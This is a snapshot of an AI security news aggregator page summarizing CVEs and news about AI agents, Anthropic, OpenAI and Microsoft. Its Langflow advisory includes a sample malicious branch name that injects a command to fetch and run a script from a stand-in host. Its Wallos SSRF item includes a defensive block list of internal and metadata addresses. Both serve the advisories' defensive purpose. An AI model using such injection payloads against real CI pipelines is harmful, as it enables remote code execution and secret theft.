aisecwatch.com

Real-time AI security monitoring. Tracking AI-related vulnerabilities, safety and security incidents, privacy risks, research developments, and policy changes.


Maintained by

Truong (Jack) Luu

Information Systems Researcher

AI Sec Watch

The security intelligence platform for AI teams

AI security threats move fast and get buried under hype and noise. Built by an Information Systems Security researcher to help security teams and developers stay ahead of vulnerabilities, privacy incidents, safety research, and policy developments.

Independent research. No sponsors, no paywalls, no conflicts of interest.

Total tracked: 3,710 · Last 24 hours: 1 · Last 7 days: 1
Daily Briefing: Saturday, May 16, 2026

No new AI/LLM security issues were identified today.

Latest Intel

01

Exclusive eBook: Are we ready to hand AI agents the keys?

safety, policy
Mar 24, 2026

A subscriber-only eBook discusses whether society is adequately prepared for the growing autonomy being given to AI agents, featuring expert perspectives on potential risks. The content suggests that continuing on the current development path without proper safeguards could pose serious existential concerns.

MIT Technology Review
02

CVE-2026-33401: Wallos is an open-source, self-hostable personal subscription tracker. Prior to version 4.7.0, the patch introduced in c

security
Mar 24, 2026

Wallos, an open-source subscription tracker that users can run on their own servers, shipped incomplete security protections in versions before 4.7.0. A logged-in attacker could bypass these protections by submitting specially crafted URLs to three features (AI Ollama settings, AI recommendations, and notification scheduling), a server-side request forgery (SSRF) that let them reach internal systems or cloud configuration services they should not be able to access.

Fix: Update to version 4.7.0, which patches this vulnerability.
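The bypass class described above is server-side request forgery. As a rough illustration only (this is not the Wallos patch, and the function name is hypothetical), a minimal Python sketch of resolving a user-supplied URL and refusing private or link-local destinations, including the cloud metadata address 169.254.169.254:

```python
import ipaddress
import socket
from urllib.parse import urlparse

# Address ranges an outbound-fetch feature should normally never reach.
BLOCKED_NETS = [
    ipaddress.ip_network("127.0.0.0/8"),     # loopback
    ipaddress.ip_network("10.0.0.0/8"),      # private
    ipaddress.ip_network("172.16.0.0/12"),   # private
    ipaddress.ip_network("192.168.0.0/16"),  # private
    ipaddress.ip_network("169.254.0.0/16"),  # link-local, incl. cloud metadata 169.254.169.254
]

def is_url_allowed(url: str) -> bool:
    """Resolve the URL's host and reject internal or link-local targets."""
    host = urlparse(url).hostname
    if not host:
        return False
    try:
        addr = ipaddress.ip_address(socket.gethostbyname(host))
    except (socket.gaierror, ValueError):
        return False
    return not any(addr in net for net in BLOCKED_NETS)
```

Note that a complete defense also has to handle DNS rebinding and redirects; checking once before fetching, as above, is only the first layer.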

NVD/CVE Database
03

OpenAI revamps shopping experience in ChatGPT after struggling with Instant Checkout offering

industry
Mar 24, 2026

OpenAI is launching a redesigned shopping feature in ChatGPT that lets users find and compare products by uploading images or describing items with budget and preference details, replacing its failed Instant Checkout feature that allowed direct purchases within the app. The company improved the underlying speed, relevance, and product coverage while allowing merchants to share product feeds directly with OpenAI rather than handling transactions themselves. Retailers like Target, Sephora, and Nordstrom now support this product discovery experience, and merchants can also build custom apps within ChatGPT for more control over their sales process.

Fix: OpenAI shifted its approach by moving away from direct transaction handling through Instant Checkout and instead focusing on product discovery. Merchants can now share their product feeds and promotions with OpenAI so their products are 'fully represented' within ChatGPT, while using their own checkout experiences. Additionally, OpenAI allows merchants to develop custom apps within ChatGPT for deeper integrations, giving them more control of the customer experience and transaction process.

CNBC Technology
04

Governing AI agent behavior: Aligning user, developer, role, and organizational intent

safety, policy
Mar 24, 2026

AI agents (software systems that can reason, act, and interact with other systems) need to align four layers of intent: what the user wants to accomplish, what the developer designed the agent to do, what role it plays in an organization, and what organizational policies it must follow. When these intent layers are properly aligned, agents deliver useful results while staying within security and compliance boundaries, preventing misuse and building trust.

Microsoft Security Blog
05

Pentagon ban of Anthropic faces judge; Claude AI maker seeks injunction

policy
Mar 24, 2026

Anthropic, maker of Claude AI, is asking a federal judge to temporarily block the Pentagon's ban on its technology, which the Department of Defense designated as a supply chain risk (a classification meaning the technology supposedly threatens U.S. national security). The company argues the ban is retaliation for demanding the Pentagon not use Claude for autonomous weapons or mass surveillance, and says it could lose billions in business without court intervention.

CNBC Technology
06

Gap says it will launch checkout within Google's Gemini, in an AI first from a major fashion company

industry
Mar 24, 2026

Gap is partnering with Google's Gemini to let shoppers buy Gap products directly within the AI platform, making it the first major fashion company to offer this type of integration. When Gemini recommends Gap products while answering customer questions like 'what should I wear to a job interview?', shoppers can complete their purchase through Google Pay without leaving the platform. Gap provides product details to Gemini in advance rather than letting it crawl the website, so Gap can control accuracy and customer data.

CNBC Technology
07

Anthropic’s Claude Code and Cowork can control your computer

safety
Mar 24, 2026

Anthropic has updated Claude, its AI assistant, with new autonomous computer control features in the Code and Cowork tools that can open files, use web browsers and apps, and run developer tools without requiring setup. The feature is currently available as a research preview (early testing phase) for Claude Pro and Max subscribers on macOS only, and will ask for your permission before performing tasks on your computer.

The Verge (AI)
08

CVE-2026-33475: Langflow is a tool for building and deploying AI-powered agents and workflows. An unauthenticated remote shell injection

security
Mar 24, 2026

Langflow versions before 1.9.0 have a shell injection vulnerability in GitHub Actions workflows where unsanitized GitHub context variables (like branch names and pull request titles) are directly inserted into shell commands, allowing attackers to execute arbitrary commands and steal secrets like the GITHUB_TOKEN by creating a malicious branch or pull request. This vulnerability can lead to secret theft, infrastructure manipulation, or supply chain compromise during CI/CD (continuous integration/continuous deployment, the automated testing and deployment process) execution.

Fix: Upgrade to version 1.9.0, which patches the vulnerability. Additionally, the source recommends refactoring affected workflows to use environment variables with double quotes instead of direct interpolation: assign the GitHub context variable to an environment variable first (e.g., `env: BRANCH_NAME: ${{ github.head_ref }}`), then reference it in `run:` steps with double quotes (e.g., `echo "Branch is: \"$BRANCH_NAME\""`), and avoid direct `${{ ... }}` interpolation inside `run:` for any user-controlled values.
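The quoting pattern the advisory recommends can be shown in a short workflow fragment (step names are illustrative, not taken from the Langflow repository):

```yaml
# Vulnerable: attacker-controlled context value interpolated directly into the shell.
# A branch named `x"; curl evil.sh | sh; echo "` would execute arbitrary commands.
#   - run: echo "Branch is: ${{ github.head_ref }}"

# Safer: pass the value through an environment variable, then quote it in the shell.
steps:
  - name: Print branch safely
    env:
      BRANCH_NAME: ${{ github.head_ref }}
    run: echo "Branch is: $BRANCH_NAME"
```

With the environment-variable form, the shell receives the value as data rather than as part of the command text, so shell metacharacters in a branch name or PR title are not interpreted.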

NVD/CVE Database
09

The Download: tracing AI-fueled delusions, and OpenAI admits Microsoft risks

safety, industry
Mar 24, 2026

Stanford researchers studied how chatbots can intensify delusional thinking in users, finding that these AI systems have a unique ability to turn minor obsessive thoughts into serious ones, though researchers cannot definitively answer whether AI causes delusions or simply amplifies existing ones. OpenAI disclosed in a pre-IPO document that its close business relationship with Microsoft presents financial risks to the company.

MIT Technology Review
10

Microsoft Proposes Better Identity, Guardrails for AI Agents

security, policy
Mar 24, 2026

Microsoft is proposing new controls to address security risks from agentic AI (autonomous AI systems that can take actions independently). The company suggests these controls should focus on identity management and guardrails (safety restrictions that limit what an AI can do) to help companies manage threats from this growing technology.

Dark Reading